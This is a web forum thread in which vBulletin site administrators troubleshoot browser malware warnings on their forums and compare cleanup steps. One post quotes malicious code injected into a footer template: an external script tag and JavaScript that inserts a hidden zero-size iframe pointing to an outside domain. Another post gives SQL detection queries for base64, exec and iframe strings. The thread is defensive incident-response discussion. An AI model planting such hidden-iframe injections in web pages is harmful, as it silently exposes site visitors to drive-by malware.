Announcement

Collapse
No announcement yet.

Forums triggering virus alerts

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    I would love to figure it out as well. I'm going to try disabling all adversing today and see what happens. I really don't suspect Google, but I'm running out of things to try.

    We have about 5k uniquies a day and maybe 2-3 reporting issues. Thing is they're running IE7, IE8, IE9, and FF so its not as isolated as I'd originally thought...
    Host for ShopFloorTalk.com

    Comment


    • #17
      I have gotten several malware warnings over the last few weeks. I can't find a problem anywhere, but have read a number of complaints blaming Google Adsense ads. Most of those complaints have been going on in the Google help forums. This is not the only time it has happened. https://www.google.com/search?q=adse...ient=firefox-a
      If my post was helpful to you, please take the time to register at my forum and ask a question you've always wanted to know about floors.
      www.TheFloorPro.com

      Comment


      • #18
        Common insertion of virus warnings is they alter the footer template and replace the connection-min.js file in clientscript/yui/connection folder.

        To find exploits embedded in your system you can follow these steps:

        1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

        2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

        3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

        4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

        5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

        6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

        Query for step 4 and 5 -
        SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

        7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

        It checks the templates for compromising code.

        8) Check .htaccess to make sure there are no redirects there.

        Finally, make sure your vBulletin is up to date. Currently this is version 4.1.9.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API - Full / Mobile
        Vote for your favorite feature requests and the bugs you want to see fixed.

        Comment


        • #19
          Originally posted by Wayne Luke View Post
          Finally, make sure your vBulletin is up to date. Currently this is version 4.1.9.
          Thanks for the help, Wayne. But please remember this forum is the vBulletin 3.8 Questions, Problems and Troubleshooting forum. None of us seeking support here are using anything greater than that version.

          Jim
          If my post was helpful to you, please take the time to register at my forum and ask a question you've always wanted to know about floors.
          www.TheFloorPro.com

          Comment


          • #20
            Originally posted by eJM View Post
            Thanks for the help, Wayne. But please remember this forum is the vBulletin 3.8 Questions, Problems and Troubleshooting forum. None of us seeking support here are using anything greater than that version.

            Jim
            Than you would need to be at 3.8.7 PL2.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API - Full / Mobile
            Vote for your favorite feature requests and the bugs you want to see fixed.

            Comment


            • #21
              We are having the same issue.. Right after (footer template):

              PHP Code:
              <form action="$vboptions[forumhome].php" method="get" style="clear:$stylevar[left]"
              Something added:

              PHP Code:
              <script type="text/javascript" src="http://www.uptimeviewer.com/icons/icons.php"></script
              Which inserts:
              HTML Code:
              GPad = {                   init: function () {                       document.write('');                       var frame = document.createElement('iframe');                       frame.setAttribute('src', 'http://www.alltagcloud.info/icons/index.php');                       frame.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');                       frame.style.visibility = 'hidden';                       frame.style.display = 'none';                       var div = document.getElementById('GPAD');                       div.appendChild(frame);                   }               }               GPad.init();
              I haven't yet figured out how it is being injected.. It could be vbseo, it could be vbulletin, could be a number of things I suppose.. I am searching the logs to no avail..

              Comment


              • #22
                Have you posted that information at vBSEO forums, Jafo?
                If my post was helpful to you, please take the time to register at my forum and ask a question you've always wanted to know about floors.
                www.TheFloorPro.com

                Comment


                • #23
                  I have not.. However, I am going to monitor all changes to the templates database. I have it setup up to immediately notify me if any change is made to any template to see if I can catch it next time..

                  Comment


                  • #24
                    So... Has anyone run the steps that I listed above? What were the results?
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API - Full / Mobile
                    Vote for your favorite feature requests and the bugs you want to see fixed.

                    Comment


                    • #25
                      Wayne, I did not run those steps because frankly, they have never worked for me to trace back these issues, which I have done successfully many times before. I can tell you that no files had changed in some time, nor had their modification times. Their modification times had also not changed on our backup server where they are rsynced to. The plugin table had not been updated in a long time either (as per mysql information_schema table)..

                      What happened is, the code was injected somehow.. In my experience, this is usually due to vbseo, not vbulletin. I am now monitoring the template table to alert me the second it is changed with all the info of who changed it, and with the $_REQUEST data. I should be able to use that and the log files to trace back what happened, should it happen again. I am assuming this is a bot of some kind, so it should be back.

                      Comment


                      • #26
                        Originally posted by Jafo View Post
                        Wayne, I did not run those steps because frankly, they have never worked for me to trace back these issues, which I have done successfully many times before. I can tell you that no files had changed in some time, nor had their modification times. Their modification times had also not changed on our backup server where they are rsynced to. The plugin table had not been updated in a long time either (as per mysql information_schema table)..

                        What happened is, the code was injected somehow.. In my experience, this is usually due to vbseo, not vbulletin. I am now monitoring the template table to alert me the second it is changed with all the info of who changed it, and with the $_REQUEST data. I should be able to use that and the log files to trace back what happened, should it happen again. I am assuming this is a bot of some kind, so it should be back.
                        I asked because in our recent experience, people have actually been exploited months before the symptoms come up. One of the common exploits is to tie a plugin into a rarely used hook that processes commands that are then passed to the command line or database directly.
                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API - Full / Mobile
                        Vote for your favorite feature requests and the bugs you want to see fixed.

                        Comment


                        • #27
                          Should that happen, my monitoring should catch that. I am going to assume for prudence sake that those using this exploit are watching, so I will shoot you a PM on how I am monitoring it..

                          Comment


                          • #28
                            Originally posted by Wayne Luke View Post
                            So... Has anyone run the steps that I listed above? What were the results?
                            Yep and I didn't find a thing. The only mods we have running are vbStopForumSpam and Forum Runner. Neither of those appear to be a point of infection either and I'm at a complete loss right now...
                            Host for ShopFloorTalk.com

                            Comment


                            • #29
                              Hmm, we are running forum runner too.. That might be the common thread?

                              Comment


                              • #30
                                Maybe... I hadn't seriously considered them, but anything is possible I guess.

                                I have AOL and Google ads on my site and have gone into Google to blocked all Google Certified Ad Networks just to see what happens. So far no reports of infection, but I just did this about 2 hours ago so time will tell as I've only been getting a couple of complaints each day.
                                Host for ShopFloorTalk.com

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...
                                X